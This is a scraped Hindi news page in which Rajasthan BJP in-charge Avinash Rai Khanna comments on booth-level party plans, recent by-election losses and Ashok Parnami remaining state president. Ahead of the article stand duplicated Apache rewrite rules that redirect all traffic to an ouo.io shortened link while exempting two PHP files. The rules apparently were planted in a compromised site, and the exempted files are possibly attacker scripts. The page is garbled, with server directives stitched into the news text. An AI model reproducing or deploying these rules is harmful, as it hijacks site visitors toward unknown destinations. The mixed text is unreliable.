
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 302
Previous Nextजयपुर। प्रदेश के कार्यकर्ताओं से सरकार का फीडबैक लेने आए राजस्थान भाजपा के प्रदेश प्रभारी अविनाश राय खन्ना का कहना है कि भाजपा के हर कार्यकर्ता की यही दिली तमन्ना है कि प्रदेश में भाजपा की सरकार फिर से रिपीट हो। उन्होंने कहा कि सभी विधायकों से भी यह अपेक्षा की जा रही है कि वह संगठन के साथ मिलकर तेजी से कार्य करें। खन्ना ने बताया कि हर बूथ पर एक पन्ना कार्यकर्ता है और एक पन्ने पर 60 वोटर है। इसके बाद अब एक कार्यकर्ता की भी जिम्मेदारी इस कार्य के लिए तय की गई है कि पन्ने के तहत आने वाले मतदाताओं को राज्य सरकार की योजनाओं को लाभ मिला है या नहीं, यह जानकारी लेवें। खन्ना ने कहा कि अभी भले ही बीते दिनों पार्टी ने अलवर, अजमेर लोकसभा और मांडलगढ़ विधानसभा उपचुनाव हारा हो, लेकिन तीन उपचुनाव की हार यह तय नहीं करती है कि विस्तारक योजना या पन्ना योजना फेल हो गई है। उन्होंने कहा कि विस्तारक योजना से संगठन को काफी लाभ हो रहा है। वहीं प्रदेश के भाजपा संगठन में नेतृत्व परिवर्तन पर प्रदेश प्रभारी अविनाश राय खन्ना ने कहा कि वह प्रदेश भाजपा प्रभारी है, और उन्हें पता है कि अशोक परनामी ही प्रदेशाध्यक्ष बने रहेंगे।